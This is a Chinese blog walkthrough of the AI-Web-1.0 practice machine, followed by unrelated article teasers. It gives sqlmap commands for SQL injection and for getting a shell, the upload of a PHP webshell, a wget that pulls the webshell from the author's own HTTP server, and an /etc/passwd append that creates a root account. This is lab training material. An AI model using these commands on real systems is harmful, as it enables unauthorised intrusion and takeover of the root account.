云尘-AI-Web-1.0

news2024/11/17 3:29:13

继续!

开扫

继续先测试web

sql注入 直接sqlmap跑

通过注入 (sqlmap查询方式省略)

存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看

然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看

无果 换另一个目录

扫出来了 /m3diNf0/info.php 去看看

这下就开朗了

因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种

第一种 --os-shell

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

我们就getshell了

第二种  --file-write

一样是通过sqlmap

来上传文件 首先写一个木马

然后通过

--file-write 木马文件 --file-dest 存放目录

上传文件

py3 .\sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --file-write C:\Users\Administrator\Desktop\1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

上传失败 但是学到了

第三种 wegt

首先就是本机开启web服务

用py即可

py3 -m http.server 8888

开启 服务后 去sqlmap的shell 中下载即可

 wget http://10.8.0.174:8888//1.php

这里因为是靶场 所以找不到本身 的ip 后面发现在openvpn里存在

这里就成功

然后我们链接后查看一下 如何提权

首先就是查看/etc/passwd的权限

-rw-r--r-- 1 www-data www-data 1664 Aug 21  2019 /etc/passwd

发现 有w 可写 那么我们就通过 openssl 伪造一下

openssl passwd -1 -salt hack 123456

然后我们看看root怎么写的

root:x:0:0:root:/root:/bin/bash

x为密码 就是上面生成的

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

然后通过echo写入

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

sudo hack 会报错

我们使用py命令

python -c 'import pty;pty.spawn("/bin/bash")'

但是最后无法实现 靶机被打坏了。。。。。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1156106.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

C# Onnx DBNet 检测条形码

效果 项目 代码 using Microsoft.ML.OnnxRuntime; using Microsoft.ML.OnnxRuntime.Tensors; using OpenCvSharp; using System; using System.Collections.Generic; using System.Drawing; using System.Linq; using System.Numerics; using System.Runtime.InteropServices.…

【广州华锐互动】风景区规划VR虚拟现实教学系统

风景区规划VR虚拟现实教学系统是一种新兴的教学工具,它可以通过虚拟现实技术,为学生提供一种沉浸式的、实时的、全方位的景区规划体验。 在风景区规划VR虚拟现实教学系统中,学生可以通过虚拟现实技术,实时地与景区进行交互。他们可…

人大金仓助力中国人民银行征信中心业务系统异地容灾优化升级

日前,人大金仓助力中国人民银行应收账款融资服务平台异地容灾项目顺利上线,保证了平台系统运行的连续性和数据安全,为充分发挥平台的融资功能,缓解中小微企业融资难提供了强有力的保障。 缓解中小微企业融资难 中国人民银行构于2…

「Qt中文教程指南」如何创建基于Qt Widget的应用程序(四)

Qt 是目前最先进、最完整的跨平台C开发工具。它不仅完全实现了一次编写,所有平台无差别运行,更提供了几乎所有开发过程中需要用到的工具。如今,Qt已被运用于超过70个行业、数千家企业,支持数百万设备及应用。 本文描述了如何使用…

【音视频 | wav】wav音频文件格式详解——包含RIFF规范、完整的各个块解析、PCM转wav代码

😁博客主页😁:🚀https://blog.csdn.net/wkd_007🚀 🤑博客内容🤑:🍭嵌入式开发、Linux、C语言、C、数据结构、音视频🍭 🤣本文内容🤣&a…

Kafka - 3.x 消费者 生产经验不完全指北

文章目录 生产经验之Consumer事务生产经验—数据积压(消费者如何提高吞吐量) 生产经验之Consumer事务 Kafka引入了消费者事务(Consumer Transactions)来确保在消息处理期间维护端到端的数据一致性。这使得消费者能够以事务的方式…

springboot2.x使用@RestControllerAdvice实现通用异常捕获

文章目录 demo地址实现效果引入基础类准备1.通用枚举与错误状态枚举2.定义通用返回结果3.自定义业务异常 统一异常捕获测试 demo地址 demo工程地址 实现效果 当我们输入1时,正常的返回通用的响应结果当我们输入2时,抛出异常,被捕获然后返回…

43基于matlab针对压缩重构感知中的稀疏优化问题,实现L1范数最小化问题求解。

基于matlab针对压缩重构感知中的稀疏优化问题,实现L1范数最小化问题求解,首先构造信号,并进行离散余弦变换,保证稀疏度,采用多个方法进行稀疏重构,分别有,(1)基于L1正则的…

代数结构上的泛型算法

一&#xff0c;半群算法 //半群 class SemiGroup { public://枚举只去掉1个数&#xff08;v.size()>1&#xff09;&#xff0c;剩下的数做p累积运算的结果template<typename T, typename Tfunc>static vector<T> allExceptOne(vector<T>& v, Tfunc p…

SOLIDWORKS 2024最新版价格:SW专业版|白金版多少钱一套?

从一开始&#xff0c;SOLIDWORKS 就一直站在让设计对每位设计师和工程师来说都触手可及的最前沿。我们的任务是通过功能强大且易于使用的产品开发解决方案&#xff0c;在创造、协作和提供创新的产品体验方面助您一臂之力。SOLIDWORKS 2024 延续了这一期望&#xff0c;同时开启了…

带你从0开始学习自动化框架Airtest

现在市面上做UI自动化的框架很多&#xff0c;包括我们常用的Web自动化框架Selenium&#xff0c;移动端自动化框架Appium。 虽然Selenium和Appium分属同源&#xff0c;而且API都有很多相同的地方&#xff0c;可以无损耗切换&#xff0c;但是还是需要引入不同的库&#xff0c;而…

PO- array数据只能接收到一条的问题处理

问题描述&#xff1a; 发送方明明是array多条数据&#xff0c;接收方通过PO接收后只有一条数据 原因分析&#xff1a; SAP AAE类适配器是按照XML格式识别&#xff0c;虽然设置为[0unbound]&#xff0c;但是由于JSON的array[]格式过来后不会自动变成多组XML&#xff0c;所以需…

【探索AI潜能,连结现代通讯】相隔万里,我们与AI一同赏月。

1️⃣写在前面 近年来&#xff0c;AI得到了迅猛的发展&#xff0c;尤其是大模型的出现受到了广泛的关注和讨论。ChatGPT、文心一言等纷纷登场&#xff0c;可谓是百家争鸣。 而AI大模型所延申出的子项目如AI绘画、AI写作等&#xff0c;在各自的领域展示出了惊人的潜力。 最圆…

风格化角色渲染方法

一、前言 二、基础结构 种类较多的风格化渲染风格 解帧分析 三、光照 漫反射和高光 增加卡通风 头发的高光 环状高光&#xff0c;物理性质的不同 解决高光形状不可控的问题 瞳孔的焦散效应 四、阴影 五、描边 六、Other

全网最详细的centos中修改tomact的端口号

&#x1f3c5;我是默&#xff0c;一个在CSDN分享笔记的博主。&#x1f4da;&#x1f4da; &#x1f31f;在这里&#xff0c;我要推荐给大家我的专栏《Linux》。&#x1f3af;&#x1f3af; &#x1f680;无论你是编程小白&#xff0c;还是有一定基础的程序员&#xff0c;这个专…

linux--线程共享内存

Linux线程共享内存空间是指多个线程可以访问同一个内存区域&#xff0c;这些线程共享该内存区域的内容。 代码&#xff1a; #include <stdio.h> #include <pthread.h>// share memoryint data 0; //定义一个全局变量datavoid *fun1(void *arg) {printf("t1:…

基于SSM的开放性实验室管理系统设计与实现

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;JSP 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#xff1a;是 目录…

Redis代替session实现用户验证

一、Redis代替session实现用户验证。 下图是session的实现登录需要实现的代码模块&#xff0c;虽然可以实现完整功能&#xff0c;但是仍然存在一些问题。 在以往使用session当作用户验证的过程中&#xff0c;会有session共享的问题&#xff0c;每次承担请求的tomcat是不一样…

vins fusion 学习(更新中)

vins fusion 学习&#xff08;更新中&#xff09; RVIZ图像&#xff1a; 绿色的是里程计路径 图像中红色的是特征点 红色框是相机 白色的小点是图像中的特征点对应到空间中的特征点 使用rosrun rqt_graph rqt_graph得到节点订阅图 可以看到rosbag发布了以下数据 imu&#xff…

「Dr. Bomkus 的试炼」排行榜说明

简要概括 七大区域&#xff0c;一个任务&#xff1a;六场扣人心弦的试炼&#xff0c;有一个休闲大厅作为每场试炼的起点。 试炼 排行榜&#xff1a;掌握每场试炼&#xff0c;攀登排行榜。 以 Ethos Point 来记分&#xff1a;每个试炼中的任务都会获得一个EP。 两种任务类型&am…